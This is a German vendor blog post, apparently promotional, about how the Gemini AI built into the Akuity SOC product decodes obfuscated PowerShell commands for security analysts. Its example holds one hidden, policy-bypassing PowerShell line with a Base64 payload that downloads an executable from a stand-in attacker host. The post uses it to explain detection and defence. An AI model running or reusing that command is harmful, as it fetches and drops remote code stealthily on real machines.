Um in ein Unternehmensnetzwerk einzudringen, ohne herkömmliche Antiviren-Warnungen auszulösen, nutzen Cyberkriminelle massiv „Living off the Land“-Techniken (LotL). Sie nutzen legitime, in Windows integrierte Tools aus, darunter vor allemPowerShell. Um jedoch zu verhindern, dass ein Administrator oder SOC-Analyst den Zweck des Skripts versteht, wenn es in den Protokollen abgefangen wird, setzen Hacker eine gewaltige Waffe ein:Verschleierung.
Der Schadcode wird verschlüsselt, komprimiert oder in unleserliche Zeichenfolgen (häufig Base64) kodiert. Angesichts eines verschleierten Befehls verschwendet ein SOC L1-Analyst wertvolle Minuten damit, ihn manuell zu entschlüsseln. Sehen wir uns an, wie die KI-Integration von Google Gemini diesen mühsamen Prozess in eine sofortige und chirurgische Analyse umwandelt.
Eine höllische Verschleierung für einen L1-Analysten
Wenn eine Threat-Hunting-Routine die Tabelle abfragtDeviceProcessEventsIn Microsoft Defender für Endpoint kann eine PowerShell-Befehlszeile wie diese zurückgegeben werden:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc aW52b2tlLXdlYnJlcXVlc3QgLXVyaSAiaHR0cDovL2JhZGNyYW1wLmNvbS9wYXlsb2FkLmV4ZSIgLU91dEZpbGUgIiRleGVjdXRhYmxlIg==
Für das menschliche Auge ist das Ende dieses Befehls nur eine Aneinanderreihung unverständlicher Buchstaben und Symbole. Um zu verstehen, was dieses Skript tatsächlich tut, muss der Analyst:
- Isolieren Sie die Base64-Zeichenfolge.
- Öffnen Sie ein Drittanbieter-Tool (wie CyberChef oder ein sicheres lokales Terminal).
- Wenden Sie eine Dekodierungsfunktion an, um Klartext anzuzeigen.
- Analysieren Sie den entschlüsselten Befehl, um seine Absicht zu verstehen (hier ein heimlicher Download einer ausführbaren Datei über
Invoke-WebRequest).
Inmitten einer Cyberkrise verschwendet die Wiederholung dieser Manipulation bei jedem verdächtigen Prozess wertvolle Zeit und erhöht das Risiko von Fehlern bei der Handhabung. Der Analyst konzentriert sich auf die Mechanismen der Rohdatenextraktion und nicht auf die Strategie, die Bedrohung zu blockieren.
Der Crashtest: Gemini AI als Sofortübersetzer
Die Architektur von Akuity SOC löst diese betrieblichen Probleme durch die native Integration der KI von Google Gemini in das Herzstück des Ticket-Panels. Sobald eine Rohnutzlast, die verschleierte Elemente oder verschlüsselte Befehlszeilen enthält, von der API aufgenommen wird, führt die KI im Hintergrund sofort eine Analyse durch.
1. Automatische Entschleierung
Keine Notwendigkeit mehr für Tools von Drittanbietern. Im Reiter „Details/Analyse“ extrahiert der Gemini-Assistent die Nutzlast, wendet seine Spracherkennungsmodelle an, dekodiert die Verschleierung (ob Base64, String-Inversion oder Verschleierung durch Umgebungsvariablen) und präsentiert das entschlüsselte Ergebnis direkt dem Analysten.
2. Kontextanalytiker und KI-Chat
Wenn sich herausstellt, dass es sich bei dem dekodierten Skript um eine Reihe komplexer Befehle handelt (z. B. um komplexe Skripts zur Ausnutzung von Speicherschwachstellen), kann der Analyst über die Registerkarte weiter vorgehen"Diskussion"(verwaltet von der KomponenteTicketChat.tsx).
Es kann der KI direkte Fragen in natürlicher Sprache stellen:
- „Erklären Sie mir den Zweck dieses Registrierungsschlüsselskripts.“
- „Welche Privilegien versucht dieser Orden zu erhöhen?“
- „Generieren Sie mir die entsprechende KQL-Abfrage, um zu prüfen, ob andere Maschinen im Arbeitsbereich diesen übergeordneten Prozess ausgeführt haben.“
Gemini AI fungiert mit vollständigem Ticketkontext und Microsoft Defender-Metadaten des Geräts als virtueller Senior-Experte (L3), der den Analysten auf niedrigerer Ebene in Echtzeit anleitet und schult.
Vom Verständnis zum schnellen Gegenangriff
Um den Wettlauf gegen den Angreifer zu gewinnen, ist eine anschließende Analyse mit aktiver Abhilfe erforderlich. Sobald Gemini den verschleierten Befehl übersetzt und die tatsächliche Gefahr hervorgehoben hat (z. B. versuchte Entra-ID-Token-Exfiltration), muss der Analyst das Portal nicht wechseln.
Im Abschnitt „Beweise“ desselben Panels kann er die von der KI empfohlene Abhilfemaßnahme validieren:Isolieren Sie das Gerätüber Intune oderSitzungen widerrufendes Benutzers, Bestellungen werden nach Validierung ihrer doppelten Authentifizierung (MFA-Stufe AAL2) sofort von der API ausgeführt.
Fazit: Hacker-Stealth neutralisieren
Verschleierung soll die Zeit menschlicher Verteidiger verschwenden. Indem Sie die Rechen- und Sprachverständnisleistung der Gemini-KI mit den Tarntechniken der Cyberkriminellen vergleichen, verkürzen Sie die Ermittlungszeit von Minuten auf Sekunden und berauben den Angreifer seiner besten Waffe: der Tarnung.
Lassen Sie nicht zu, dass verschleierter Code Ihre Untersuchungen verlangsamt.> Entdecken Sie die Leistungsfähigkeit des AssistentenGemini AI in Akuity SOC integriertund Bedrohungen sekundengenau entschlüsseln.